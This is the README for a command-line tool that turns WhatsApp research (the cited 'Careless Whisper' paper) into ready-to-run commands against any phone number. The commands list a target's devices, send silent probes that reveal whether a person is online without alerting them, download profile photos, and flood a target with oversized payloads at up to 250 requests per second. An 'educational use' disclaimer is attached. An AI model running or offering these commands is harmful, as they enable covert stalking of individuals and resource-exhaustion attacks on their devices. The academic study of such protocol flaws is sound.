
WhatsApp Intelligence & Resource Exhaustion Tool. Include tracciamento dei dispositivi in tempo reale, probing RTT silenzioso e test di stress del protocollo per la ricerca sulla sicurezza.
Disclaimer: Questo strumento è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza. Gli sviluppatori non sono responsabili di un uso improprio. Si prega di utilizzarlo in modo responsabile ed etico.
WaSonar è un potente strumento CLI progettato per la ricerca educativa, il monitoraggio dei dispositivi e i test di stress sul protocollo WhatsApp. Costruito su Baileys.
npm install -g wasonar-cli
npx wasonar-cli <comando>
git clone https://github.com/AjayAntoIsDev/wasonar.git
cd wasonar
npm install
Per prima cosa, è necessario autenticarsi con un account WhatsApp.
wasonar-cli login
Scansiona il codice QR che appare nel terminale.
Elenca tutti i dispositivi collegati a un numero target.
wasonar-cli devices <numero-target>
# Esempio:
wasonar-cli devices 919876543210
La funzionalità principale. Invia sonde silenziose per rilevare se i dispositivi sono online e misurare la latenza.
# Sonda infinite volte (predefinito)
wasonar-cli online 919876543210
# Invia un numero specifico di sonde
wasonar-cli online 919876543210 --probes 5
# Salva i risultati in un file
wasonar-cli online 919876543210 --output ./logs
Nota: PENDING/OFFLINE significa che il server ha ricevuto il messaggio, ma il dispositivo target non ne ha confermato la ricezione.
Ottieni la foto del profilo e lo stato dell'utente.
# Mostra le informazioni e scarica la foto del profilo
wasonar-cli profile 919876543210 --output ./profiles
⚠️ SOLO PER USO EDUCATIVO. Invia payload di dimensioni eccessive ad alta frequenza.
# Modalità aggressiva (predefinito: 250 req/s, payload da 1KB)
wasonar-cli exhaust 919876543210
# Modalità lenta (10 req/s, payload da 500B)
wasonar-cli exhaust 919876543210 --aggression slow
# Imposta la durata
wasonar-cli exhaust 919876543210 --duration 30
WaSonar utilizza "Sonde di eliminazione silenziosa" per rilevare lo stato online senza avvisare il target.
revoked (cancellato) per un ID messaggio inesistente.delivery_receipt (stato 3) per il messaggio di protocollo.Basato sulla ricerca "Careless Whisper", questo attacco sfrutta il divario di validazione nella gestione delle reazioni di WhatsApp.
Sebbene le reazioni non vengano visualizzate sul telefono del target se non valide, vengono comunque ricevute ed elaborate.
I dati di ricerca indicano un potenziale significativo di esaurimento delle risorse:
Basato sulla ricerca di Gegenhuber et al., Università di Vienna e SBA Research:
@inproceedings{gegenhuber2024careless,
title={Careless Whisper: Exploiting Silent Delivery Receipts to Monitor Users on Mobile Instant Messengers},
author={Gegenhuber, Gabriel K. and G{\"u}nther, Maximilian and Maier, Markus and Judmayer, Aljosha and Holzbauer, Florian and Frenzel, Philipp {\'E}. and Ullrich, Johanna},
year={2024},
organization={University of Vienna, SBA Research}
}
Creato da AjayAnto